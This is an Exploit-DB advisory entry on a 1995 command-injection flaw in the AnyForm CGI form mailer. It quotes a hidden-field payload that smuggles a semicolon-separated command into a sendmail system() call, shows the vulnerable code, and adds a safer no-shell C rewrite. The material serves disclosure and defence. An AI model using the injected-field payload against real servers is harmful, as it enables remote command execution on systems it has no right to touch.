
John S.2 Roberts AnyForm 1.0/2.0 - CGI Semicolon

31 Jul 1995 | Reported by Paul Phillips | Type: exploitdb | www.exploit-db.com

AnyForm versions lacked data sanity checks, allowing command execution by remote attackers.

Code
source: https://www.securityfocus.com/bid/719/info

AnyForm is a popular form CGI designed to support simple forms that deliver responses via email. Certain versions of AnyForm did not perform sanity checking on user-supplied data and could be exploited by remote intruders to execute arbitrary commands. These commands were issued as the UID which the web server runs as, typically 'nobody'.

Exploit as taken from the original post on this issue:

To exploit, create a form with a hidden field something like this:

<input type="hidden" name="AnyFormTo" value="[email protected];command-to-execute
with whatever arguments;/usr/lib/sendmail -t [email protected] ">

Then submit the form to the "AnyForm" CGI on the server to be attacked.
The value of this parameter is passed to this code:

SystemCommand="/usr/lib/sendmail -t " + AnyFormTo + " <" + CombinedFileName;
system(SystemCommand);

Since system invokes a shell, the semicolons are treated as command
delimiters and anything can be inserted.
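
For contrast with the system() call quoted above, here is a sketch of the same delivery step done without a shell. It is an added example, not AnyForm's code or its actual fix; the names recipient_ok and send_form and the mailer path parameter are hypothetical.

```c
#include <ctype.h>
#include <fcntl.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allow-list check (hypothetical helper): one address, no shell metacharacters, no option prefix. */
int recipient_ok(const char *addr)
{
    size_t len = strlen(addr);
    const char *at = strchr(addr, '@');

    if (len == 0 || len > 254 || addr[0] == '-')
        return 0;                       /* empty, oversized, or looks like an option */
    if (at == NULL || at == addr || at[1] == '\0' || strchr(at + 1, '@'))
        return 0;                       /* need exactly one '@' with text on both sides */
    for (const char *p = addr; *p; p++)
        if (!isalnum((unsigned char)*p) && strchr("@._+-", *p) == NULL)
            return 0;                   /* rejects ';', spaces, quotes, '<', '|', ... */
    return 1;
}

/* Deliver without a shell: the address is a single argv entry, and the
 * message file becomes stdin via dup2() instead of a "<" redirection.
 * Returns the mailer's exit status, or -1 on rejection or failure. */
int send_form(const char *mailer, const char *addr, const char *msgfile)
{
    int status;
    pid_t pid;

    if (!recipient_ok(addr))
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        int fd = open(msgfile, O_RDONLY);
        if (fd < 0 || dup2(fd, STDIN_FILENO) < 0)
            _exit(127);
        execl(mailer, "sendmail", "-t", addr, (char *)NULL);
        _exit(127);                     /* only reached if execl() failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

Because execl() passes the address as one argument, no shell ever parses it; the allow-list additionally stops a value beginning with '-' from being read by the mailer as an option.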
